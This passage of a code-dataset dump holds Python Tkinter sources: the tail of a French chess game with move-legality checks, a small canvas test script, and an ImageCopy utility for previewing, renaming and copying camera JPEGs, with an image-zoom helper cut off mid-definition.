(coups[coup][0]!=\"r\"):\r\n\t\t\t\t\t\t\tcoup+=2\r\n\t\t\t\t\t\tif coup==nbreCoups:\r\n\t\t\t\t\t\t\tpiece = echiquier.find_enclosed(0*64+32+marge-32, Y*64+32+marge-32, 0*64+32+marge+32, Y*64+32+marge+32)[0]\r\n\t\t\t\t\t\t\techiquier.coords(piece, 3*64+32+marge, 7*64+32+marge)\r\n\t\t\t\t\t\t\tposition[7][0] = \"R\"\r\n\t\t\t\t\t\t\tposition[7][3] = \"tourB\"\r\n\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tposition[Y][3] = \"R\"\r\n\t\t\t\t\t\tposition[Y][4] = \"roiB\"\r\n\t\t\t\telif Y==7 and X==6 and position[Y][4]==\"roiB\" and position[Y][5]==\"R\" and position[Y][6]==\"R\" and position[Y][7] ==\"tourB\":\r\n\t\t\t\t\tposition[Y][5] = \"roiB\"\r\n\t\t\t\t\tposition[Y][4] = \"R\"\r\n\t\t\t\t\tif coupLegal():\r\n\t\t\t\t\t\tposition[Y][5] = \"R\"\r\n\t\t\t\t\t\tposition[Y][4] = \"roiB\"\r\n\t\t\t\t\t\tcoup = 0\r\n\t\t\t\t\t\tnbreCoups = len(coups)-2\r\n\t\t\t\t\t\tprint(nbreCoups)\r\n\t\t\t\t\t\twhile coup!=nbreCoups and (coups[coup][0]!=\"t\" or coups[coup][2]!=7 or coups[coup][3]!=Y) and (coups[coup][0]!=\"r\"):\r\n\t\t\t\t\t\t\tcoup+=2\r\n\t\t\t\t\t\tif coup==nbreCoups:\r\n\t\t\t\t\t\t\tpiece = echiquier.find_enclosed(7*64+32+marge-32, 7*64+32+marge-32, 7*64+32+marge+32, 7*64+32+marge+32)[0]\r\n\t\t\t\t\t\t\techiquier.coords(piece, 5*64+32+marge, 7*64+32+marge)\r\n\t\t\t\t\t\t\tposition[7][7] = \"R\"\r\n\t\t\t\t\t\t\tposition[7][5] = \"tourB\"\r\n\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tposition[Y][5] = \"R\"\r\n\t\t\t\t\t\tposition[Y][4] = \"roiB\"\r\n\r\n\t\t\t\treturn abs(posX-X)<=1 and abs(posY-Y)<=1\r\n\r\n###################################################PIONS BLANCS##########################################################\r\n\r\n\t\t\telif piece>=16 and piece<=23:\r\n\t\t\t\tif position[Y][X][-1] == \"N\" and posY-Y==1 and abs(posX-X)==1:\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\tfor ligne in range(Y, posY):\r\n\t\t\t\t\tif position[ligne][X] != \"R\":\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\tif Y==2 and coups[-1][0] == \"p\" and coups[-1][4] == X and coups[-1][3]+2==coups[-1][5] and posY==3 and abs(posX-X)==1:\r\n\t\t\t\t\tposition[Y+1][X] = \"R\"\r\n\t\t\t\t\tcapturePiece(X, (Y+1))\r\n\t\t\t\t\treturn True\r\n\t\t\t\tif posY==6:\r\n\t\t\t\t\treturn (posY-Y<=2 and posY>Y and posX==X)\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn (posY-Y<=1 and posY>Y and posX==X)\r\n\r\n\r\n\r\n#----------------------------------------------------Trait aux noirs----------------------------------------------------#\r\n#\r\n#\r\n\telif piece>=0 and piece<=15:\r\n\t\tif joueur == \"blanc\":\r\n\t\t\t#showinfo(\"Alerte\", \"C'est aux blancs de jouer\")\r\n\t\t\treturn False\r\n\t\telse:\r\n\r\n###################################################TOUR NOIRE###########################################################\r\n\r\n\t\t\tif piece==0 or piece==7:\r\n\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X] == \"R\":\r\n\t\t\t\t\treturn X==posX or Y==posY\r\n\t\t\t\telif position[Y][X][-1] == \"B\" and (X==posX or Y==posY):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn False\r\n\r\n###################################################CAVALIER NOIR########################################################\r\n\r\n\t\t\telif piece==1 or piece==6:\r\n\t\t\t\tif position[Y][X] == \"R\":\r\n\t\t\t\t\treturn (abs(posX-X)==2 and abs(posY-Y)==1) or (abs(posX-X)==1 and abs(posY-Y)==2)\r\n\t\t\t\telif position[Y][X][-1] == \"B\":\r\n\t\t\t\t\tif (abs(posX-X)==2 and abs(posY-Y)==1) or (abs(posX-X)==1 and abs(posY-Y)==2):\r\n\t\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn False\r\n\r\n####################################################FOU NOIR############################################################\r\n\r\n\t\t\telif piece==2 or piece==5:\r\n\t\t\t\tif (X>posX and Y>posY) or (X<posX and Y<posY):\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t#print(ligne, colonne, ligne-min(posY,Y), colonne-min(posX,X), position[ligne][colonne], \"\\n\")\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne-min(posY,Y)==colonne-min(posX,X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t#print(ligne, colonne, ligne+colonne, max(posY, Y)+min(posX, X), position[ligne][colonne], \"\\n\")\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne+colonne==max(posY, Y)+min(posX, X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X][-1] == \"B\" and abs(posX-X)==abs(posY-Y):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn position[Y][X] == \"R\" and abs(posX-X)==abs(posY-Y)\r\n\r\n###################################################DAME NOIRE###########################################################\r\n\r\n\t\t\telif piece==3:\r\n\t\t\t\tif (X==posX or Y==posY):\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tif (X>posX and Y>posY) or (X<posX and Y<posY):\r\n\t\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne-min(posY,Y)==colonne-min(posX,X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne+colonne==max(posY, Y)+min(posX, X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X][-1] == \"B\" and ((abs(posX-X)==abs(posY-Y)) or (X==posX or Y==posY)):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\treturn position[Y][X] == \"R\" and (abs(posX-X)==abs(posY-Y)) or (X==posX or Y==posY)\r\n\r\n###################################################ROI NOIR#############################################################\r\n\r\n\t\t\telif piece==4:\r\n\t\t\t\tif position[Y][X] != \"R\" and position[Y][X][-1] != \"B\":\r\n\t\t\t\t\treturn False\r\n\t\t\t\telif abs(posX-X)<=1 and abs(posY-Y)<=1 and position[Y][X][-1] == \"B\":\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\treturn abs(posX-X)<=1 and abs(posY-Y)<=1\r\n\r\n###################################################PIONS NOIRS##########################################################\r\n\r\n\t\t\telif piece>=8 and piece<=15:\r\n\t\t\t\tif position[Y][X][-1] == \"B\" and Y-posY==1 and abs(posX-X)==1:\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\tfor ligne in range(posY+1, Y+1):\r\n\t\t\t\t\tif position[ligne][X] != \"R\":\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\tif Y==5 and coups[-1][0] == \"p\" and coups[-1][4] == X and coups[-1][3]==coups[-1][5]+2 and posY==4 and abs(posX-X)==1:\r\n\t\t\t\t\tposition[Y-1][X] = \"R\"\r\n\t\t\t\t\tcapturePiece(X, (Y-1))\r\n\t\t\t\t\treturn True\r\n\t\t\t\tif posY==1:\r\n\t\t\t\t\treturn (Y-posY<=2 and Y>posY and posX==X)\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn (Y-posY<=1 and Y>posY and posX==X)\r\n\r\n\t\r\n\r\ndef nouvellePartie():\r\n\tglobal position, coups\r\n\t#showinfo(\"Début en cours\", \"Une nouvelle partie est sur le point de débuter\")\r\n\tposition = [[\"tourN\",\"cavalierN\",\"fouN\",\"dameN\",\"roiN\",\"fouN\",\"cavalierN\",\"tourN\"],[\"pionN\",\"pionN\",\"pionN\",\"pionN\",\"pionN\",\"pionN\",\"pionN\",\"pionN\"],[\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\"],[\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\"],[\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\"],[\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\"],[\"pionB\",\"pionB\",\"pionB\",\"pionB\",\"pionB\",\"pionB\",\"pionB\",\"pionB\"],[\"tourB\",\"cavalierB\",\"fouB\",\"dameB\",\"roiB\",\"fouB\",\"cavalierB\",\"tourB\"]]\r\n\tcoups = []\r\n\tplacerPieces()\r\n\r\ndef lancement():\r\n\tnouvellePartie()\r\n\r\n\r\nlancement()\r\nroot.mainloop()\r\n" }, { "alpha_fraction": 0.6041190028190613, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 21, "blob_id": "fc6b39e507fa980ea263dedfc04ddb9a49180920", "content_id": "6d33cf8e9e88154a6a70400a5147e1cd54636b7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "no_license", "max_line_length": 68, "num_lines": 19, "path": "/test.py", "repo_name": "NicoTirel/jeuEchecs", "src_encoding": "UTF-8", "text": "from tkinter import *\r\nfrom functools import partial\r\n\r\nroot = Tk()\r\n\r\nroot['bg']='#A4A4A4'\r\nroot.geometry(\"1000x600+10+10\")\r\nroot.title('Crashtest')\r\n\r\ndef hello(piece, event):\r\n\tprint(\"yousk2\")\r\n\r\nechiquier = Canvas(root, width=600, height=600, background='white')\r\nechiquier.pack()\r\n\r\ncarre = echiquier.create_rectangle(200, 200, 300, 300, fill=\"black\")\r\nechiquier.tag_bind(carre, '<Button-1>', partial(hello, 1))\r\n\r\nroot.mainloop()\r\n" } ]
2
peverett/ImageCopy
https://github.com/peverett/ImageCopy
495a1c51ea92c73785349873b0acecca5eb9936e
5bcac7ba5fca249ee26d7fa3dbf24a1dc388fbf4
4b0531926bb5ef4c7b088653ae7ce3126bcc3e83
refs/heads/master
2020-05-19T13:07:46.268392
2019-06-27T16:01:14
2019-06-27T16:01:14
185,032,288
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5493024587631226, "alphanum_fraction": 0.5559512972831726, "avg_line_length": 33.660491943359375, "blob_id": "e3ea963466380ee37328bcf0998be28fbb92ff66", "content_id": "e8d08361ea34f73458bacc9095ab5efef95d1d45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16845, "license_type": "no_license", "max_line_length": 82, "num_lines": 486, "path": "/ImageCopy.py", "repo_name": "peverett/ImageCopy", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"Copy Digital Camera IMages (DCIM) from a source \nMemory Card or USB to a specified destination folder. \n\nAllows image preview for selective copying,\nfile renaming based on EXIF data such as Date \nand Time image was made.\"\"\"\n\n__version__ = \"1.0\"\n__author__ = \"[email protected]\"\n__all__ = ['__version__', '__author__']\n\nimport os\nimport configparser\nimport glob\nimport sys\nif sys.version_info[0] > 2:\n import tkinter.font as tkFont\n from tkinter import *\n from tkinter import messagebox, filedialog\nelse:\n import tkFont\n from Tkinter import *\nfrom PIL import Image, ImageTk\nfrom ImageScale import ImageCanvas\nfrom datetime import datetime\nfrom shutil import copyfile\n\ndef GetConfigFilename():\n \"\"\"Return the config file name based on the following rules:\n * Config file is in the same directory as the python script.\n * Config file has the same name but with extention '.ini'\n \"\"\"\n thisfile = os.path.splitext(\n os.path.abspath(__file__)\n )[0]\n return os.path.join(\n '.'.join([thisfile, 'ini'])\n )\n \ndef UpdateConfigFile(config):\n \"\"\"Update the Config File by writing it.\"\"\"\n with open(GetConfigFilename(), 'w') as cf:\n config.write(cf)\n\ndef LoadConfigFile():\n \"\"\"Load the Config File. If it doesn't exist, then create it.\"\"\"\n config = configparser.ConfigParser()\n\n # If we can't read a config, create one.\n if not config.read(GetConfigFilename()):\n home = os.path.expanduser('~')\n \n config['DEFAULT'] = {\n 'source': 'C:\\\\',\n 'destination': home,\n 'use_date': 'no',\n 'use_time': 'no',\n 'use_user': 'no',\n 'use_name': 'yes',\n 'descr': 'Example1,Example2',\n }\n\n UpdateConfigFile(config)\n\n return config\n\ndef ListJpgFiles(path):\n \"\"\"return a list of all files with the .jpg extension in the path passed.\"\"\"\n jpgfiles = glob.glob(\n os.path.join(path, '*.jpg')\n )\n return jpgfiles\n\nclass ImageCopyController(object):\n \"\"\"ImageCopy Controller Class\"\"\"\n \n def __init__(self, root):\n self.root = root\n\n # Tkinter variables \n self.src_str = StringVar()\n self.dst_str = StringVar()\n self.zoom_str = StringVar()\n self.user_str = StringVar()\n self.date_str = StringVar()\n self.time_str = StringVar()\n self.fn_str = StringVar()\n self.fnum_str = StringVar()\n self.chosen = StringVar()\n\n self.cb_date = IntVar()\n self.cb_time = IntVar()\n self.cb_name = IntVar()\n self.cb_user = IntVar()\n\n # Get defaults from Config file, or set them!\n self.config = LoadConfigFile()\n self.jpgfiles = ListJpgFiles(self.config['DEFAULT']['source'])\n self.jpgidx = 0 # Index on first image in the list.\n self.jpglen = len(self.jpgfiles)\n self.cb_date.set(self.config.getboolean('DEFAULT','use_date'))\n self.cb_time.set(self.config.getboolean('DEFAULT','use_time'))\n self.cb_user.set(self.config.getboolean('DEFAULT','use_user'))\n self.cb_name.set(self.config.getboolean('DEFAULT','use_name'))\n\n self.root.bind('<Destroy>', self.destroy_cmd)\n\n self.MenuBar() \n\n left_frm = Frame(self.root)\n left_frm.pack(side=LEFT, fill=BOTH, expand=YES)\n\n self.ic = ImageCanvas(left_frm)\n self.button_frame(left_frm)\n self.source_frame(left_frm)\n self.destination_frame(left_frm)\n\n right_frm = Frame(self.root)\n right_frm.pack(side=RIGHT, fill=Y, expand=NO)\n\n self.file_info_frame(right_frm)\n self.image_options_frame(right_frm)\n self.user_input_frame(right_frm)\n\n #root.state('zoomed')\n\n if self.jpgfiles:\n self.update_image_source()\n \n def copy_file_cmd(self):\n copyfile(self.src_str.get(), self.dst_str.get())\n\n def destroy_cmd(self, event):\n \"\"\"What happens when the app is closed down.\"\"\"\n self.config['DEFAULT']['descr'] = ','.join(self.usr_descr)\n UpdateConfigFile(self.config)\n\n def options_cmd(self):\n \"\"\"Action on check box being ticked.\"\"\"\n self.update_options()\n self.update_destination()\n\n def update_options(self):\n \"\"\"Update options such as image file options or source and destination\n directories.\"\"\"\n self.config['DEFAULT']['use_date'] = 'yes' if self.cb_date.get() else 'no'\n self.config['DEFAULT']['use_time'] = 'yes' if self.cb_time.get() else 'no'\n self.config['DEFAULT']['use_user'] = 'yes' if self.cb_user.get() else 'no'\n self.config['DEFAULT']['use_name'] = 'yes' if self.cb_name.get() else 'no'\n\n def update_destination(self):\n \"\"\"Update the destination file name.\"\"\"\n image =self.jpgfiles[self.jpgidx]\n cdt = datetime.fromtimestamp(os.path.getctime(image))\n self.date_str.set(cdt.strftime('%Y-%m-%d'))\n self.time_str.set(cdt.strftime('%H:%M:%S'))\n\n cfn = list()\n if self.cb_date.get():\n cfn.append(cdt.strftime('%Y%m%d'))\n if self.cb_time.get():\n cfn.append(cdt.strftime('%H%M%S'))\n ud = self.chosen.get()\n if len(ud) and self.cb_user.get():\n cfn.append(ud)\n if self.cb_name.get():\n cfn.append(self.fn_str.get())\n\n copy_name = os.path.join(\n self.config['DEFAULT']['Destination'],\n \"{}.jpg\".format('_'.join(cfn)))\n self.dst_str.set(copy_name)\n self.usr_descr = self.listbox.get(0, END)\n\n def update_image_source(self):\n image =self.jpgfiles[self.jpgidx]\n\n self.src_str.set(image)\n self.fn_str.set(os.path.basename(image))\n self.fnum_str.set(\"{} of {}\".format(self.jpgidx+1, self.jpglen))\n \n self.ic.load_image(image)\n self.zoom_str.set(\"{:d} %\".format(self.ic.get_zoom()))\n self.update_destination()\n\n def next_cmd(self):\n if self.jpgfiles:\n if self.jpgidx < self.jpglen-1:\n self.jpgidx += 1\n self.update_image_source()\n\n def prev_cmd(self):\n if self.jpgfiles:\n if self.jpgidx > 0:\n self.jpgidx -= 1\n self.update_image_source()\n\n def zoom_in(self):\n self.ic.zoom_in()\n self.zoom_str.set(\"{:d} %\".format(self.ic.get_zoom()))\n\n def zoom_out(self):\n self.ic.zoom_out()\n self.zoom_str.set(\"{:d} %\".format(self.ic.get_zoom()))\n\n def SetConfigDir(self, directory='destination'):\n \"\"\"Set the 'directory' in the configuration. By default this is the\n 'destination' directory.\n \"\"\"\n new_dir = os.path.normpath(\n filedialog.askdirectory(\n initialdir=self.config['DEFAULT'][directory],\n title=\"Select {} folder\".format(directory)\n )\n )\n \n if self.config['DEFAULT'][directory] != new_dir:\n self.config['DEFAULT'][directory] = new_dir\n\n def SetDestinationDir(self):\n self.SetConfigDir()\n self.update_destination()\n\n def SetSourceDir(self):\n self.SetConfigDir('Source')\n self.jpgfiles = ListJpgFiles( self.config['DEFAULT']['source'] )\n self.jpgidx = 0\n self.jpglen = len(self.jpgfiles)\n\n if not self.jpgfiles:\n messagebox.showwarning(\n \"No JPG files found!\",\n '\\n'.join([\n \"No JPG files found In directory:\",\n self.config['DEFAULT']['source']\n ])\n )\n else:\n self.update_image_source()\n\n def AboutImageCopy(self):\n messagebox.showinfo(\n \"About: ImageCopy\",\n ''.join([\n __doc__, '\\n\\n',\n 'Author: ', __author__, '\\n\\n'\n 'Version: ', __version__,\n ])\n )\n\n def MenuBar(self):\n \"\"\"Application Menu Bar\"\"\"\n menubar = Menu(self.root)\n \n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Set Source Dir\", command=self.SetSourceDir)\n filemenu.add_command(\n label=\"Set Destination Dir\", command=self.SetDestinationDir)\n filemenu.add_separator()\n filemenu.add_command(label=\"Exit\", command=self.root.quit)\n menubar.add_cascade(label=\"File\", menu=filemenu)\n\n helpmenu = Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About\", command=self.AboutImageCopy)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n\n self.root.config(menu=menubar)\n\n def button_frame(self, parent):\n \"\"\"Frame to contain buttons for moving through images and zooming the\n current image.\"\"\"\n frm = Frame(parent, bd=5)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n prev = Button(\n frm, text=\"<< Prev\", padx=5, pady=5, command=self.prev_cmd)\n prev.pack(side=LEFT, fill=X, expand=YES)\n\n zoom_in = Button(\n frm, text=\"Zoom In (+)\", padx=5, pady=5, command=self.zoom_in)\n zoom_in.pack(side=LEFT, fill=X, expand=YES)\n\n copy_image = Button(\n frm, text=\"Copy Image\", padx=5, pady=5, \n command=self.copy_file_cmd)\n copy_image.pack(side=LEFT, fill=X, expand=YES)\n\n zoom_out = Button(\n frm, text=\"Zoom Out (-)\", padx=5, pady=5, command=self.zoom_out)\n zoom_out.pack(side=LEFT, fill=X, expand=YES)\n\n next = Button(\n frm, text=\"Next >>\", padx=5, pady=5, command=self.next_cmd)\n next.pack(side=LEFT, fill=X, expand=YES)\n\n def source_frame(self, parent):\n \"\"\"Frame to contain the labels for displaying the source path & file\"\"\"\n frm = Frame(parent, bd=1)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n legend = Label(\n frm, text=\"Source:\", width=15, anchor=W, padx=5)\n legend.pack(side=LEFT, fill=X, expand=NO)\n\n info = Label(\n frm, bd=5, bg='black', fg='white', anchor=W, \n textvariable=self.src_str, width=85, padx=5) \n info.pack(side=LEFT, fill=X, expand=YES)\n \n def destination_frame(self, parent):\n \"\"\"Frame to contain the labels for displaying the destination path\n and filename.\"\"\"\n frm = Frame(parent, bd=1)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n legend = Label(\n frm, text=\"Destination:\", anchor=W, width=15, padx=5)\n legend.pack(side=LEFT, fill=X, expand=NO)\n\n info = Label(\n frm, bd=5, bg='black', fg='white', anchor=W, \n textvariable=self.dst_str, width=85, padx=5) \n info.pack(side=LEFT, fill=X, expand=YES)\n\n def file_info_frame(self, parent):\n \"\"\"Frame to display the image information.\"\"\"\n frm = Frame(parent, relief=RIDGE, bd=5)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n title = Label(\n frm, text=\"File Information\", width=30, \n justify=CENTER, pady=10, padx=5)\n title.pack(side=TOP, fill=X, expand=NO)\n\n fnum_frame = Frame(frm)\n fnum_frame.pack(side=TOP, fill=X, expand=NO)\n fn_legend = Label(\n fnum_frame, text=\"File #:\", width=10, \n anchor=W, padx=5, pady=5)\n fn_legend.pack(side=LEFT, fill=X, expand=NO)\n filenum = Label(\n fnum_frame, textvariable=self.fnum_str, bg='black', fg='white',\n anchor=W, width=20)\n filenum.pack(side=LEFT, fill=X, expand=NO)\n\n fn_frame = Frame(frm)\n fn_frame.pack(side=TOP, fill=X, expand=NO)\n fn_legend = Label(\n fn_frame, text=\"File name:\", width=10, \n anchor=W, padx=5, pady=5)\n fn_legend.pack(side=LEFT, fill=X, expand=NO)\n filename = Label(\n fn_frame, textvariable=self.fn_str, bg='black', fg='white',\n anchor=W, width=20)\n filename.pack(side=LEFT, fill=X, expand=NO)\n\n dt_frame = Frame(frm)\n dt_frame.pack(side=TOP, fill=X, expand=NO)\n dt_legend = Label(\n dt_frame, text=\"Create date:\", width=10, \n anchor=W, padx=5, pady=5)\n dt_legend.pack(side=LEFT, fill=X, expand=NO)\n date = Label(\n dt_frame, textvariable=self.date_str, bg='black', fg='white',\n anchor=W, width=20)\n date.pack(side=LEFT, fill=X, expand=NO)\n\n tm_frame = Frame(frm)\n tm_frame.pack(side=TOP, fill=X, expand=NO)\n tm_legend = Label(\n tm_frame, text=\"Create time:\", width=10, \n anchor=W, padx=5, pady=5)\n tm_legend.pack(side=LEFT, fill=X, expand=NO)\n date = Label(\n tm_frame, textvariable=self.time_str, bg='black', fg='white',\n anchor=W, width=20)\n date.pack(side=LEFT, fill=X, expand=NO)\n\n zm_frame = Frame(frm)\n zm_frame.pack(side=TOP, fill=X, expand=NO)\n zm_legend = Label(\n zm_frame, text=\"Image zoom:\", width=10, \n anchor=W, padx=5, pady=5)\n zm_legend.pack(side=LEFT, fill=X, expand=NO)\n date = Label(\n zm_frame, textvariable=self.zoom_str, bg='black', fg='white',\n anchor=W, width=20)\n date.pack(side=LEFT, fill=X, expand=NO)\n\n def user_input_frame(self, parent):\n \"\"\"Frame for user to input a part of the filename when copied.\n Entry box for user input.\n List for history of last 10 user inputs.\"\"\"\n frm = Frame(parent, relief=RIDGE, bd=5)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n title = Label(\n frm, text=\"User Description\", width=30, \n justify=CENTER, pady=5, padx=5)\n title.pack(side=TOP, fill=X, expand=NO)\n \n selected = Label(frm, textvariable=self.chosen, bg='black', fg='white')\n selected.pack(side=TOP, fill=X, expand=NO)\n\n ufrm = Frame(frm)\n ufrm.pack(side=TOP, fill=X, expand=NO)\n\n user_entry = Entry(\n ufrm, textvariable=self.user_str, width=20, bd=5, \n bg='black', fg='white')\n user_entry.pack(side=LEFT, fill=X, expand=YES)\n\n add_btn = Button(\n ufrm, text=\"Add\", padx=10, pady=5, anchor=E,\n command=self.update_select)\n add_btn.pack(side=LEFT, fill=X, expand=NO)\n\n self.listbox = Listbox(frm, selectmode=SINGLE)\n self.listbox.pack(side=TOP, fill=X, expand=NO)\n self.listbox.bind('<Double-Button-1>', self.list_select)\n\n for choice in self.config['DEFAULT']['descr'].split(','):\n self.listbox.insert(END, choice)\n\n def update_select(self, event=None):\n if not len(self.user_str.get()):\n return\n\n self.listbox.insert(0, self.user_str.get())\n self.chosen.set(self.user_str.get())\n if self.listbox.size() > 10:\n self.listbox.delete(END)\n\n self.user_str.set(\"\")\n self.update_destination()\n \n \n def list_select(self, event):\n sel = self.listbox.curselection()[0]\n temp = self.listbox.get(sel)\n self.chosen.set(temp)\n self.listbox.delete(sel)\n self.listbox.insert(0, temp)\n self.update_destination()\n\n def image_options_frame(self, parent):\n frm = Frame(parent, relief=RIDGE, bd=5)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n title = Label(\n frm, text=\"Destination Name Options\", width=30, \n justify=CENTER, pady=5, padx=5)\n title.pack(side=TOP, fill=X, expand=NO)\n\n date= Checkbutton(\n frm, text=\"Created file date\", padx=20,\n anchor=W, variable=self.cb_date, command=self.options_cmd)\n date.pack(side=TOP, fill=X, expand=NO)\n\n time= Checkbutton(\n frm, text=\"Created file time\", padx=20,\n anchor=W, variable=self.cb_time, command=self.options_cmd)\n time.pack(side=TOP, fill=X, expand=NO)\n\n user = Checkbutton(\n frm, text=\"User description \", padx=20,\n anchor=W, variable=self.cb_user, command=self.options_cmd)\n user.pack(side=TOP, fill=X, expand=NO)\n\n name = Checkbutton(\n frm, text=\"Source file name \", padx=20,\n anchor=W, variable=self.cb_name, command=self.options_cmd)\n name.pack(side=TOP, fill=X, expand=NO)\n \n\n\ndef main():\n \"\"\"Main function\"\"\"\n root = Tk()\n root.title(\"ImageCopy\")\n control = ImageCopyController(root)\n root.mainloop()\n \nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.548858642578125, "alphanum_fraction": 0.5580697059631348, "avg_line_length": 30.40880584716797, "blob_id": "feec2ed953d7f7d23766e0a0371e196d36125939", "content_id": "4d50145cfb0ce859e85c963da869666195b572ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4994, "license_type": "no_license", "max_line_length": 90, "num_lines": 159, "path": "/ImageScale.py", "repo_name": "peverett/ImageCopy", "src_encoding": "UTF-8", "text": "import sys\nif sys.version_info[0] > 2:\n import tkinter.font as tkFont\n from tkinter import *\n from tkinter import messagebox, filedialog\nelse:\n import tkFont\n from Tkinter import *\nfrom PIL import Image, ImageTk\n\ndef invfrange(start, stop, step):\n \"\"\"Inverted (reverse) range inclusive of the final stop value, designed \n to work with floats.\"\"\"\n val = start\n vrange = []\n while val > stop:\n vrange.append(val)\n val = round(val - step, 2) # round to 2-decimal places.\n vrange.append(stop)\n return vrange\n\nclass ImageCanvas:\n def __init__(self, root):\n self.root = root\n self.image_id = None\n self.scale_range = []\n\n self.hsb = Scrollbar(root, orient='horizontal')\n self.vsb = Scrollbar(root, orient='vertical')\n self.max_zoom_out = 4.0\n\n self.canvas = Canvas(\n root, \n bg='black', \n width=800, \n height=600,\n xscrollcommand=self.hsb.set,\n yscrollcommand=self.vsb.set\n )\n self.canvas.pack(side=TOP, fill='both', expand='yes')\n self.canvas.update()\n \n self.hsb.configure(command=self.canvas.xview)\n self.vsb.configure(command=self.canvas.yview)\n\n self.canvas.bind('<Enter>', self.enter)\n self.canvas.bind('<Leave>', self.leave)\n self.canvas.bind('<Configure>', self.resize)\n\n self.image = None\n self.scale_idx = 0\n self.scale_range = []\n\n def load_image(self, image_path):\n \"\"\"Load the image indicated\"\"\"\n self.image = Image.open(image_path)\n self.calc_scale_range(self.image.size)\n self.scale_idx = len(self.scale_range)-1\n self.show_image()\n\n def move_from(self, event):\n ''' Remember previous coordinates for scrolling with the mouse '''\n self.canvas.scan_mark(event.x, event.y)\n\n def move_to(self, event):\n ''' Drag (move) canvas to the new position '''\n self.canvas.scan_dragto(event.x, event.y, gain=1)\n\n def enter(self, event):\n self.canvas.bind('<ButtonPress-1>', self.move_from)\n self.canvas.bind('<B1-Motion>', self.move_to)\n self.canvas.bind_all('<MouseWheel>', self.zoom)\n\n def leave(self, event):\n self.canvas.unbind('<ButtonPress-1>')\n self.canvas.unbind('<B1-Motion>')\n self.canvas.unbind_all('<MouseWheel>')\n\n def 